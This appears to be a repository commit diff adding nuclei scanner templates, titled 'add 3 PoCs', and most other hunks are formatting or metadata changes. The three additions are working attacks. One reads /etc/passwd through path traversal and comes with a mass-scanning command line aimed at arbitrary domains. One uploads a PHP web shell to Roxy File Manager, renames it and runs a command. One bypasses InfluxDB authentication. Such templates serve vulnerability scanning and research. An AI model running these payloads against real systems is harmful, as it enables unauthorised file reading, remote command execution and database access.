add 3 PoCs 2022-08-23

Author: hktalent

config/nuclei-templates/51pwn/pay001.xml

@@ -0,0 +1,25 @@
+id: logs-passwd
+info:
+  name: logs-passwd
+  severity: high
+  author:
+  - 51pwn
+  description: |-
+    cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
+
+requests:
+  - raw:
+      - |
+        GET /logs/downloadMainLog?fname=../../../../../../..//etc/passwd HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        
+      
+    matchers:
+      - type: word
+        part: body
+        words:
+        - 'root:x:'
+        
+    redirects: false
+  

config/nuclei-templates/cves/2018/CVE-2018-19749.yaml

@@ -1,4 +1,5 @@
 id: CVE-2018-19749
+
 info:
   name: DomainMOD 4.11.01 - Cross-Site Scripting
   author: arafatansari

config/nuclei-templates/cves/2019/CVE-2019-18665.yaml

@@ -1,4 +1,5 @@
 id: CVE-2019-18665
+
 info:
   name: DOMOS 5.5 - Local File Inclusion
   author: 0x_Akoko

config/nuclei-templates/cves/2019/CVE-2019-20933.yaml

@@ -0,0 +1,39 @@
+id: CVE-2019-20933
+
+info:
+  name: Authentication Bypass InfluxDB
+  author: pussycat0x,c-sh0
+  severity: critical
+  description: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
+  reference:
+    - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
+    - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
+  remediation: Update Influxdb to version 1.6.7~rc0-1 or higher.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2019-20933
+    cwe-id: CWE-287
+  metadata:
+    shodan-dork: InfluxDB
+    verified: "true"
+  tags: unauth,db,influxdb,misconfig
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"results":'
+          - '"name":"databases"'
+        condition: and
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/cves/2020/CVE-2020-20988.yaml

@@ -1,4 +1,5 @@
 id: CVE-2020-20988
+
 info:
   name: DomainMOD 4.13.0 - Cross-Site Scripting
   author: arafatansari

config/nuclei-templates/cves/2021/CVE-2021-24910.yaml

@@ -4,13 +4,15 @@ info:
   name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS)
   author: Screamy
   severity: medium
+  description: |
+    The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue
   reference:
     - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
     - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
     - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910
   metadata:
-    verified: true
+    verified: "true"
   tags: cve,cve2021,wordpress,wp-plugin,xss,wp
 
 requests:

config/nuclei-templates/cves/2021/CVE-2021-37589.yaml

@@ -1,4 +1,5 @@
 id: CVE-2021-37589
+
 info:
   name: Virtua Software Cobranca <12R - Blind SQL Injection
   author: princechaddha

config/nuclei-templates/cves/2021/CVE-2021-41569.yaml

@@ -1,4 +1,5 @@
 id: CVE-2021-41569
+
 info:
   name: SAS/Internet 9.4 1520 - Local File Inclusion
   author: 0x_Akoko

config/nuclei-templates/cves/2022/CVE-2022-0540.yaml

@@ -10,6 +10,7 @@ info:
     - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
     - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
+  remediation: Ensure you are using the latest version and that all security patches have been applied.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8

config/nuclei-templates/cves/2022/CVE-2022-0594.yaml

@@ -1,4 +1,5 @@
 id: CVE-2022-0594
+
 info:
   name: Shareaholic < 9.7.6 - Information Disclosure
   author: atomiczsec

config/nuclei-templates/cves/2022/CVE-2022-27849.yaml

@@ -1,4 +1,5 @@
 id: CVE-2022-27849
+
 info:
   name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability
   author: random-robbie

config/nuclei-templates/cves/2022/CVE-2022-27927.yaml

@@ -1,4 +1,5 @@
 id: CVE-2022-27927
+
 info:
   name: Microfinance Management System 1.0 - SQL Injection
   author: lucasljm2001,ekrause

config/nuclei-templates/cves/2022/CVE-2022-36883.yaml

@@ -1,4 +1,5 @@
 id: CVE-2022-36883
+
 info:
   name: Git Plugin up to 4.11.3 on Jenkins Build Authorization
   author: c-sh0

config/nuclei-templates/default-logins/hybris/hybris-default-login.yaml

@@ -1,4 +1,5 @@
 id: hybris-default-login
+
 info:
   name: Hybris Default Login
   author: princechaddha

config/nuclei-templates/exposed-panels/ibm/ibm-maximo-login.yaml

@@ -1,4 +1,5 @@
 id: ibm-maximo-login
+
 info:
   name: IBM Maximo Login Panel
   author: ritikchaddha

config/nuclei-templates/exposed-panels/ibm/ibm-websphere-admin-panel.yaml

@@ -1,4 +1,5 @@
 id: ibm-websphere-admin-panel
+
 info:
   name: WebSphere Application Server Community Edition Admin Panel
   author: ritikchaddha

config/nuclei-templates/exposed-panels/nagvis-panel.yaml

@@ -0,0 +1,32 @@
+id: nagvis-panel
+
+info:
+  name: Nagvis Panel Detect
+  author: ritikchaddha
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"NagVis"
+  tags: panel,nagvis
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/nagvis/frontend/nagvis-js/index.php"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "/nagvis/frontend"
+          - "<title>NagVis"
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposed-panels/roxy-fileman.yaml

@@ -0,0 +1,34 @@
+id: roxy-fileman
+
+info:
+  name: Roxy Fileman Detect
+  author: liquidsec,DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    google-dork: intitle:"Roxy file manager"
+  tags: tech,fileupload,roxy,fileman
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.html"
+      - "{{BaseURL}}/fileman/index.html"
+      - "{{BaseURL}}/fileman/php/fileslist.php"
+      - "{{BaseURL}}/fileman/asp_net/main.ashx"
+
+    stop-at-first-match: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Roxy file manager'
+          - '[{"p":"'
+        condition: or
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/exposures/files/redmine-config.yaml

@@ -1,4 +1,5 @@
 id: redmine-config
+
 info:
   name: Redmine Configuration
   author: DhiyaneshDK

config/nuclei-templates/misconfiguration/jolokia/jolokia-info-disclosure.yaml

@@ -1,4 +1,5 @@
 id: jolokia-info-disclosure
+
 info:
   name: Jolokia - Information disclosure
   author: pussycat0x

config/nuclei-templates/misconfiguration/jolokia/jolokia-list.yaml

@@ -1,4 +1,5 @@
 id: jolokia-list
+
 info:
   name: Jolokia - List
   author: pussycat0x
@@ -24,4 +25,4 @@ requests:
       - type: word
         part: body
         words:
-          - '"type":"list"'
+          - '"type":"list"'

config/nuclei-templates/misconfiguration/jolokia/jolokia-mbean-search.yaml

@@ -1,4 +1,5 @@
 id: jolokia-mbean-search
+
 info:
   name: Jolokia - Searching MBeans
   author: pussycat0x
@@ -26,4 +27,4 @@ requests:
         words:
           - '"type":"search"'
           - '"value":'
-        condition: and
+        condition: and

config/nuclei-templates/misconfiguration/roxyfileman-fileupload.yaml

@@ -0,0 +1,82 @@
+id: roxyfileman-fileupload
+
+info:
+  name: Roxy Fileman 1.4.4 - Arbitrary File Upload
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,which keeps a list of forbidden file extensions that the application will not allow to be uploaded. This configuration setting is also checked when renaming an existing file to a new file extension.It is possible to bypass this check and rename already uploaded files to any extension, using the move function as this function does not perform any checks.
+  reference:
+    - https://www.exploit-db.com/exploits/39963
+  metadata:
+    verified: "true"
+    google-dork: intitle:"Roxy file manager"
+  tags: roxy,fileman,rce,upload,intrusive,misconfig
+
+requests:
+  - raw:
+      - |
+        POST /php/upload.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6rbEqFAMRkE0RAB7
+
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="action"
+
+        upload
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="method"
+
+        ajax
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="d"
+
+        /app/Uploads
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7
+        Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.jpg"
+        Content-Type: image/jpeg
+
+        <?php
+        echo exec($_GET["cmd"]);
+        ?>
+
+        ------WebKitFormBoundary6rbEqFAMRkE0RAB7--
+
+      - |
+        POST /php/renamefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n={{randstr}}.php
+
+      - |
+        POST /php/movefile.php?f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        f=%2Fapp%2FUploads%2F{{randstr}}.jpg&n=%2Fapp%2FUploads%2F{{randstr}}.php
+
+      - |
+        GET /Uploads/{{randstr}}.php?cmd=echo+"roxyfileman"+|+rev HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "namelifyxor"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

config/nuclei-templates/technologies/samsung-smarttv-debug.yaml

@@ -1,4 +1,5 @@
 id: samsung-smarttv-debug
+
 info:
   name: Samsung SmartTV Debug Config
   author: pussycat0x

config/nuclei-templates/technologies/sap-spartacus-detect.yaml

@@ -1,4 +1,5 @@
 id: sap-spartacus-detect
+
 info:
   name: SAP Spartacus detect
   author: TechbrunchFR

config/nuclei-templates/vulnerabilities/other/devalcms-xss.yaml

@@ -1,4 +1,5 @@
 id: devalcms-xss
+
 info:
   name: Devalcms 1.4A - Cross-Site Scripting
   author: arafatansari

config/nuclei-templates/workflows/azure-workflow.yaml

@@ -0,0 +1,9 @@
+id: azure-workflow
+
+info:
+  name: Azure Checks
+  author: DhiyaneshDk
+  description: A simple workflow that runs all Azure related nuclei templates on a given target.
+
+workflows:
+  - tags: azure

config/nuclei-templates/workflows/dell-idrac-workflow.yaml

@@ -1,4 +1,5 @@
 id: dell-idrac-workflow
+
 info:
   name: Dell iDRAC Security Checks
   author: kophjager007
@@ -19,4 +20,4 @@ workflows:
 
   - template: technologies/dell/dell-idrac9-detect.yaml
     subtemplates:
-      - template: default-logins/dell/dell-idrac9-default-login.yaml
+      - template: default-logins/dell/dell-idrac9-default-login.yaml